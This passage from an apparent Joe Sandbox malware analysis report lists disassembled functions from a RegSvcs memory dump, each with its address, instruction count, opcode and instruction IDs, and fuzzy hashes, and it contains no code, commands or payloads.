                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71a9a70533a42621c64e0eddbd1a0a0fc319b86da3b03a39383c54c4698d5462
                                                          • Instruction ID: 67f28d12e437a65b103991de6310adb31ec25b32190a61620ba006a752b9c816
                                                          • Opcode Fuzzy Hash: 71a9a70533a42621c64e0eddbd1a0a0fc319b86da3b03a39383c54c4698d5462
                                                          • Instruction Fuzzy Hash: B0025C30E1020A8FDB64EF69D484BADB7B2FF85318F1085AAE405EB251DB35DD41CB91
                                                          Function 06549210 Relevance: .2, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b5126b044b4e026c4c5e41bfd1b6e8bab1934a892d90e6a2aab86748f65ec99
                                                          • Instruction ID: cc03169eb2facb45e0c1a7525181c23e49ab78203ffa839946997e51ca306471
                                                          • Opcode Fuzzy Hash: 5b5126b044b4e026c4c5e41bfd1b6e8bab1934a892d90e6a2aab86748f65ec99
                                                          • Instruction Fuzzy Hash: 62915D30B0061A8BDB54EB69D851BAFB3F2BF89704F5485A9C809EB344EE719D418F91
                                                          Function 065462B8 Relevance: .2, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6335acbe6d9aabafa933f50f4aef6c4088d59aea54c707a800e8af3d560666e
                                                          • Instruction ID: 2d8c15acfea3b0802632ff0d4f0353c8360da6ca3627a3838b075f116559d899
                                                          • Opcode Fuzzy Hash: b6335acbe6d9aabafa933f50f4aef6c4088d59aea54c707a800e8af3d560666e
                                                          • Instruction Fuzzy Hash: 0B611471F001214BDF54AB7EC98466FFAEBAFC5224B154079E80ADB360DE65EC028BD1
                                                          Function 06544378 Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64f90237b6c024ddc68ad97ce13dbf06842292ce53deee0849d8d4ca02e687f9
                                                          • Instruction ID: 044c46cf3bb523f52585eae68ac4fced47b3e34a5aee547330cc1de58bc9d786
                                                          • Opcode Fuzzy Hash: 64f90237b6c024ddc68ad97ce13dbf06842292ce53deee0849d8d4ca02e687f9
                                                          • Instruction Fuzzy Hash: A5814B34B0020A8BDF54EFB9D4547AEB7E2EB89314F148569D40AEB385EB31DC428B91
                                                          Function 06544694 Relevance: .2, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01d296c0fbfa25b4d014dc9e70dad719a8cf0d1a7348a85953f0ac8687cc9549
                                                          • Instruction ID: 1fb722dc9677f8788ef2829319e414c61e332155055b8b56fbf2aa900fdeeb6e
                                                          • Opcode Fuzzy Hash: 01d296c0fbfa25b4d014dc9e70dad719a8cf0d1a7348a85953f0ac8687cc9549
                                                          • Instruction Fuzzy Hash: 93916F30E102198FDF60DF68C880B9DB7B1FF89304F208699D549BB245DB71AA86CF90
                                                          Function 065446A8 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32e24d5b1910e94fd94a5bcbef6fb57ba37a7aef84ecd2c8e47df1fb2de9c749
                                                          • Instruction ID: 6956da8324172ec7fdeee02d2ac1495f4556ccac9baacfa51086e15379020710
                                                          • Opcode Fuzzy Hash: 32e24d5b1910e94fd94a5bcbef6fb57ba37a7aef84ecd2c8e47df1fb2de9c749
                                                          • Instruction Fuzzy Hash: 5C915034E102198BDF60DF68C840B9DB7B1FF89304F208599D549BB345DB71AA86CF90
                                                          Function 0654EBC0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6044c9c9bc5a204979b4bf74328a92168346de7d31ae2463072ef65e3b7ba2b2
                                                          • Instruction ID: 706ab855b19ba18956fe0ca353afe6ad06200904eccaf8d0a3e9b62c0b11523f
                                                          • Opcode Fuzzy Hash: 6044c9c9bc5a204979b4bf74328a92168346de7d31ae2463072ef65e3b7ba2b2
                                                          • Instruction Fuzzy Hash: A6714C30A006099FDB54EFA8D981AADBBF6FF88304F248569E405EB355DB30ED46CB50
                                                          Function 0654EBD0 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f83a0a01abdde42e85dc25edc158d7a4005013eabc0fb465591250aa2bd301ea
                                                          • Instruction ID: 2fb23223eeb9042c42f3031a52a0392e90f7134e6be6fb6bee5e180120f80856
                                                          • Opcode Fuzzy Hash: f83a0a01abdde42e85dc25edc158d7a4005013eabc0fb465591250aa2bd301ea
                                                          • Instruction Fuzzy Hash: F4712C30A006099FDB54EFA9D981AADBBF6FF88304F248569E405EB355DB30ED46CB50
                                                          Function 06544C40 Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfd34df860cdfbaaf9374f21548ab531489c3f36264151a57f4780b42087ce41
                                                          • Instruction ID: 3fa3ee5a78a4a3b3cdb566a52c8a32c797c6a15a62e733d6406707e0c88a1750
                                                          • Opcode Fuzzy Hash: cfd34df860cdfbaaf9374f21548ab531489c3f36264151a57f4780b42087ce41
                                                          • Instruction Fuzzy Hash: 1E618170F002099FEB54ABB5C8547AEBBF6FF88704F20842AE106AB395DF754D458B90
                                                          Function 0654FD30 Relevance: .2, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34d6e2504557b70f24c975aa7b48910954adb9c2f70d2d9e98415d80387e0b6f
                                                          • Instruction ID: 65229c124564715eb816e3b1edcabc5c51c02967c797e97b4359f7c7d7f935d1
                                                          • Opcode Fuzzy Hash: 34d6e2504557b70f24c975aa7b48910954adb9c2f70d2d9e98415d80387e0b6f
                                                          • Instruction Fuzzy Hash: AA51B131E0110ADFDB64EB7CE8846ADB7B2FFC9319F1188AAE106D7251DB318855CB90
                                                          Function 06549200 Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d10fc5e241ec599d752bc7c66068d5c16b6be3defc9fe8b7cfa116faf92735e7
                                                          • Instruction ID: 6ecb5746632b3afc4b1da5f417e9ce1bf83927b12a617116c798fb99b60aeda3
                                                          • Opcode Fuzzy Hash: d10fc5e241ec599d752bc7c66068d5c16b6be3defc9fe8b7cfa116faf92735e7
                                                          • Instruction Fuzzy Hash: C8514C31B002059BDB54EB78D861BBFB3F6FB88744F54856AD809EB344EE319C418B91
                                                          Function 0654FADF Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a02b74aaffee10fcf489f67a2f4e5bbefec88ba62fc8dc2b0b06dba96ecf837c
                                                          • Instruction ID: 4b1f449505d87b2ae8e553d7df9ed73fd6a5eac9e10e20cb3f933ec957745868
                                                          • Opcode Fuzzy Hash: a02b74aaffee10fcf489f67a2f4e5bbefec88ba62fc8dc2b0b06dba96ecf837c
                                                          • Instruction Fuzzy Hash: 1851A830B102088BEF5476BCE85476F375AEBCA708F20456AE50BD7395CE39CC418BA2
                                                          Function 0654FAF0 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 126a5a06636e0acfb450ee1cfddbb4a3b7c396afe8707bb6c83bb51a79bd7972
                                                          • Instruction ID: a5ff53af6e0a22d57f62714efa0a52bd9e4830500d469ee4ea1469c5e00987b2
                                                          • Opcode Fuzzy Hash: 126a5a06636e0acfb450ee1cfddbb4a3b7c396afe8707bb6c83bb51a79bd7972
                                                          • Instruction Fuzzy Hash: B9519730B102188BFFA476ACE85476F325AE7CA718F604426E50BD7395CF39CC418BA2
                                                          Function 06544C31 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7eae73b41a087b0568c8a324b96abaa886c157da208d4adb738024b31447edde
                                                          • Instruction ID: fbd34b4c139f5d1535e795e591a1c8c2c083f93c4e0668e6f4ca8b3822113cac
                                                          • Opcode Fuzzy Hash: 7eae73b41a087b0568c8a324b96abaa886c157da208d4adb738024b31447edde
                                                          • Instruction Fuzzy Hash: 57417274E102089FEB549BB5C814BAEBAF6FFC8700F20C529E506AB395DE755C058B90
                                                          Function 065454E8 Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfca214f45cbdb8f5b5be6d2123506e26d0e77146331ebe34ffd80f45be08c34
                                                          • Instruction ID: 4762a480dc1e21bc281a0749bf08cdd971a91018b3fe8598a90ed14c41db1425
                                                          • Opcode Fuzzy Hash: bfca214f45cbdb8f5b5be6d2123506e26d0e77146331ebe34ffd80f45be08c34
                                                          • Instruction Fuzzy Hash: 23419F71E006098FDF70DEA9D880ABFFBB2FB85214F10496AE156D7250E630A945CF91
                                                          Function 0654DB75 Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e0ab62013e637d0a4cd846fa1a90540d517a9e9171790112ed4cb797ec4df1d
                                                          • Instruction ID: 0746061dcfa725457fa6e8218f8f678054cb30445ad160645880eaa6e8c1604d
                                                          • Opcode Fuzzy Hash: 2e0ab62013e637d0a4cd846fa1a90540d517a9e9171790112ed4cb797ec4df1d
                                                          • Instruction Fuzzy Hash: 17417230E00609DFDB64EFB5D84469EBBB6BF85748F10866AE405E7240DB719941CF91
                                                          Function 065422B0 Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca666cde83cc937f01b2c82bb35d84d91ad7df2c123e0b29a8abe45656624236
                                                          • Instruction ID: 8dc64bd7b0c4d0d63ad1cf48910338dcbee792d79703bc67873feb13406e95c3
                                                          • Opcode Fuzzy Hash: ca666cde83cc937f01b2c82bb35d84d91ad7df2c123e0b29a8abe45656624236
                                                          • Instruction Fuzzy Hash: 8031B030B0021A8FDB58AB78D8147AE77E2BB88614F208569E406EB355DF35DD42CB91
                                                          Function 06542160 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a38c853ef4731653bb72b753824b65b59e42685538207fbc4d6a49ece0fe3f8e
                                                          • Instruction ID: 15815ed3515192c670e09b7c041afa6959d47f171491b55dfec39572af5ce712
                                                          • Opcode Fuzzy Hash: a38c853ef4731653bb72b753824b65b59e42685538207fbc4d6a49ece0fe3f8e
                                                          • Instruction Fuzzy Hash: E331D235E102199BDB15DF64D894A9EBBB2BF88300F10C529F906E7340DB71AC42CB90
                                                          Function 06545660 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc41d90806d01fa580419b6c4ecb799fe7a8cf6b6307326e3521d379340e08ca
                                                          • Instruction ID: 816986b3d5fe65c6d16568a7d287ae2031dea5ef956af04bc3012004044e4067
                                                          • Opcode Fuzzy Hash: cc41d90806d01fa580419b6c4ecb799fe7a8cf6b6307326e3521d379340e08ca
                                                          • Instruction Fuzzy Hash: 7E319235E002058FEF609FA8C880A6EBBB1FB45314F10C86AE555D7252D635D941DF91
                                                          Function 06542170 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 934ffe22d136e38006f0353b59942b04ed2520142a19d4a92cc6df3cdaa6a39c
                                                          • Instruction ID: bd364bee674ce1075714d608712fa7e5cfbbe19f52b6d73c6889fa7b77cae2aa
                                                          • Opcode Fuzzy Hash: 934ffe22d136e38006f0353b59942b04ed2520142a19d4a92cc6df3cdaa6a39c
                                                          • Instruction Fuzzy Hash: 47318E35E1021A9BDB58DFA5D894A9EB7B2BF89304F10C529F906E7340DB71AD42CB90
                                                          Function 06543B79 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6093107982b062daada8161f407d926467d59ba9f1c615e429d12e8972cfa160
                                                          • Instruction ID: c360e39599ad1ab5ddfea44f3cd8e8b5b53b14cfd861a6e7219e96815e75c6df
                                                          • Opcode Fuzzy Hash: 6093107982b062daada8161f407d926467d59ba9f1c615e429d12e8972cfa160
                                                          • Instruction Fuzzy Hash: CA21A935E106159FDB50EF7AE840BAEBBF5FB88704F108065E804EB390E735D8008B90
                                                          Function 06543B88 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81ccdfe6bae642e4a3618460ce4ab87edfd973298d831467cb1e53dc8fb25d59
                                                          • Instruction ID: 47780c4abbe8af2f9abdcaef596dadc040ae370a6269130d0073b870c0db0ca9
                                                          • Opcode Fuzzy Hash: 81ccdfe6bae642e4a3618460ce4ab87edfd973298d831467cb1e53dc8fb25d59
                                                          • Instruction Fuzzy Hash: 90217A75E006159FDB50EFBAD880BAEBBF5FB88714F108069E905E7394E735D9008B90
                                                          Function 06543C98 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c581bc0b70b7302e3c072b2cf08f73b6d61daa97a1244565e37c927b1bece1bb
                                                          • Instruction ID: 6f8d6a75f952655e47c195e697db840a3f90d2411b70785f653b849e65ca71c9
                                                          • Opcode Fuzzy Hash: c581bc0b70b7302e3c072b2cf08f73b6d61daa97a1244565e37c927b1bece1bb
                                                          • Instruction Fuzzy Hash: BE11E132B101248BCF54AA79D8146BE73EBEBC8704F048479D50AEB354DE25CC028BD0
                                                          Function 06543951 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bbeed6b3a431c9883f375061b90184a86d8af17c7c2e217d3ed32a8c65bca494
                                                          • Instruction ID: 0f4fc395b74bf38953f71824683b005ae7a6b9d3a53b0a9c98a81a65d56fbd71
                                                          • Opcode Fuzzy Hash: bbeed6b3a431c9883f375061b90184a86d8af17c7c2e217d3ed32a8c65bca494
                                                          • Instruction Fuzzy Hash: 8D21E3B5D01219AFCB00DF9AE885ADEFBB4FB48324F10826AE518A7250C7756944CFA5
                                                          Function 0654A3CA Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79a07558cf4d21ea12622856b76a486732e3d1ea70164090e1a769179cf8054b
                                                          • Instruction ID: ddaa6a3d2b9b7a111a2770caa7a2e5ceff82bc2dbfd57d718d05ad3a45ae7548
                                                          • Opcode Fuzzy Hash: 79a07558cf4d21ea12622856b76a486732e3d1ea70164090e1a769179cf8054b
                                                          • Instruction Fuzzy Hash: 7D012830B015140FC7A8A638D855B5F37D5EB85788F00C469F54AC7345EE21DC018BD1
                                                          Function 065442D8 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0a61efc4dc8bde63646f46815eaaa43bb8216a689fded5e834e0f882a85dcb3
                                                          • Instruction ID: 0a8a0373c1fda71b348b1e26b47fb4cbd5c85dddfbb39955175a40e1510deded
                                                          • Opcode Fuzzy Hash: d0a61efc4dc8bde63646f46815eaaa43bb8216a689fded5e834e0f882a85dcb3
                                                          • Instruction Fuzzy Hash: 6501FC35B041004BDB64A67DA820B6EBACAEBC9B14F1484BEE10AC7346ED61DC4247D6
                                                          Function 06543C89 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0310edb7db9db2a59fb89a349999dde834076d4bbc7a5316d81d0b7cb2fba8d7
                                                          • Instruction ID: e544725d521d8746eaf9f91e170fe8d978e885b6b37cde2121ea22ede8423ec7
                                                          • Opcode Fuzzy Hash: 0310edb7db9db2a59fb89a349999dde834076d4bbc7a5316d81d0b7cb2fba8d7
                                                          • Instruction Fuzzy Hash: C301B136B101245BDB55A67ADC14AFB76EBEBC8704F44403AD10AD7354DA61CC0247D1
                                                          Function 0654EE3F Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df3527d988c0042956fbce8a4e6a730517f948542ebdb98a62cd145d05eb140a
                                                          • Instruction ID: 1b78ff8b41a9c2fb72d8a0fa7783e097e57a7c7799d3770d663c9f1cedc43a4c
                                                          • Opcode Fuzzy Hash: df3527d988c0042956fbce8a4e6a730517f948542ebdb98a62cd145d05eb140a
                                                          • Instruction Fuzzy Hash: E201F134B042114BCB26A638A4A472F3BD6EBCA618F1488AAE14AC7381EE21CC124791
                                                          Function 06543958 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e132fe6aaf540a251b9101554c9a8b3c1278d780548baa66325f6cd621cad4a2
                                                          • Instruction ID: 43d93a83e38f1df1b52890eafbc45c083220481d0e93251197e72dfc76508d3f
                                                          • Opcode Fuzzy Hash: e132fe6aaf540a251b9101554c9a8b3c1278d780548baa66325f6cd621cad4a2
                                                          • Instruction Fuzzy Hash: CD11CCB1D01219AFCB10DF9AD885ADEFBF8FB48314F10816AE918A7240C375A954CFA5
                                                          Function 065442E8 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 303c0de1ff88fa08639912d3901c2b68db97cce00323e5b8a72195fe6032d603
                                                          • Instruction ID: 2e597d8555a838b04767cc572a4d0d0a9a13d53b0f80fddd3d9c58692b3bc092
                                                          • Opcode Fuzzy Hash: 303c0de1ff88fa08639912d3901c2b68db97cce00323e5b8a72195fe6032d603
                                                          • Instruction Fuzzy Hash: 4D01AD35B100114BDB68A5AD9464B6FB2CAEBC9B18F14C43AE10AC7344EE61DC424785
                                                          Function 0654EE50 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f21eb5b62478114ff311db94a5a04b470336872fa8adf16e584df4c373ada77
                                                          • Instruction ID: 73ee6d44619f7deb6f2e3ff8e048fbc7ff727925178e800b233d89f389fe05f9
                                                          • Opcode Fuzzy Hash: 6f21eb5b62478114ff311db94a5a04b470336872fa8adf16e584df4c373ada77
                                                          • Instruction Fuzzy Hash: C401DC34B104124BCB65A67D94A5B2F73DAFBC8A18F108839E20AC7340EE21DC020785
                                                          Function 0654C880 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0522b99552c9656719d8644117fb64691e32c4bfa93213c19f2f58cf1145505f
                                                          • Instruction ID: ea7539d2173609f8ef491a6f3ed54745a092d5c1ca4e953ded0d2965682312c6
                                                          • Opcode Fuzzy Hash: 0522b99552c9656719d8644117fb64691e32c4bfa93213c19f2f58cf1145505f
                                                          • Instruction Fuzzy Hash: 46F02435B22274ABCB20A576EC01ECB7B7AFBC0728F000565F901EB289DB319C41CAD0
                                                          Function 0654A3D8 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1489439937.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_6540000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 589d0ece005340d295a4b4b144ce1396ca5e9bc0edac3690092c3612227cb7f2
                                                          • Instruction ID: edb3ec54140de6c1b3d8cdecc40e29dc6ae6ab505253fc5a227815ae218fd93b
